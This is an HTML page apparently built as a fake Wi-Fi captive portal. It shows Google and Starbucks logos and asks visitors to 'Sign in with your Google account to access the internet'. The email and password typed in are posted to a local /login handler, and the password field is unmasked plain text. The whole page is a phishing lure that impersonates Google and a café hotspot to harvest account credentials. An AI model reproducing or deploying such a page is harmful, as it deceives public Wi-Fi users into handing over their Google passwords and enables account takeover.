<html>
<head>
  <title>Connect</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1">
  <style>
    @font-face {
      font-family: 'Open Sans';
      font-style: normal;
      font-weight: 400;
      src:
        local(''),
        url('/fonts/open-sans-v28-latin-regular.woff2') format('woff2'),
        url('/fonts/open-sans-v28-latin-regular.woff') format('woff');
    }
    @font-face {
      font-family: 'Open Sans';
      font-style: italic;
      font-weight: 400;
      src:
        local(''),
        url('/fonts/open-sans-v28-latin-italic.woff2') format('woff2'),
        url('/fonts/open-sans-v28-latin-italic.woff') format('woff');
    }
    @font-face {
      font-family: 'Open Sans';
      font-style: normal;
      font-weight: 500;
      src:
        local(''),
        url('/fonts/open-sans-v28-latin-500.woff2') format('woff2'),
        url('/fonts/open-sans-v28-latin-500.woff') format('woff');
    }
    @font-face {
      font-family: 'Open Sans';
      font-style: italic;
      font-weight: 500;
      src:
        local(''),
        url('/fonts/open-sans-v28-latin-500italic.woff2') format('woff2'),
        url('/fonts/open-sans-v28-latin-500italic.woff') format('woff');
    }
    @font-face {
      font-family: 'Open Sans';
      font-style: normal;
      font-weight: 700;
      src:
        local(''),
        url('/fonts/open-sans-v28-latin-700.woff2') format('woff2'),
        url('/fonts/open-sans-v28-latin-700.woff') format('woff');
    }
    @font-face {
      font-family: 'Open Sans';
      font-style: italic;
      font-weight: 700;
      src:
        local(''),
        url('/fonts/open-sans-v28-latin-700italic.woff2') format('woff2'),
        url('/fonts/open-sans-v28-latin-700italic.woff') format('woff');
    }
    * {
      font-family: 'Open Sans', sans-serif;
      margin: 0;
    }
    input[type=text] {
      outline:none;
      border: 1px solid lightgray;
      border-radius: 5px;
    }
    input[type=text]:focus {
      border: 2px solid #1a73e8;
    }
  </style>
</head>

<body>
  <div style="width:100%;height:100%;display:flex;flex-direction:column;align-items:center;justify-content:center">
    <div style="display:flex;flex-direction:column;align-items:center;gap:35px;border:1px solid lightgray;border-radius:5px;padding:65px 40px">
      <div style="display:flex;align-items:center;gap:18px">
        <img src="/img/google.png" style="width:65px;height:65px">
        <img src="/img/thin-x.png" style="width:20px;height:20px">
        <img src="/img/starbucks.png" style="width:65px;height:65px">
      </div>
      <div style="display:flex;flex-direction:column;align-items:center;gap:10px">
        <p style="font-size:22px">Sign in with your Google account</p>
        <p style="font-size:14px">to access the internet</p>
      </div>
      <form action="/login" method="post" style="margin-top:10px;display:flex;flex-direction:column;align-items:center;gap:15px">
        <input type="text" id="input_username" name="username" placeholder="Email or phone" style="width:350px;height:48px;font-size:16px;padding:0 15px">
        <input type="text" id="input_password" name="password" placeholder="Password" style="width:350px;height:48px;font-size:16px;padding:0 15px">
        <div style="width:100%;margin-top:20px;display:flex;justify-content:flex-end">
          <input type="submit" value="Sign in" style="font-size:15px;font-weight:500;padding:10px 25px;border:none;background-color:#1a73e8;color:white;border-radius:5px">
        </div>
      </form>
    </div>
  </div>
</body>
</html>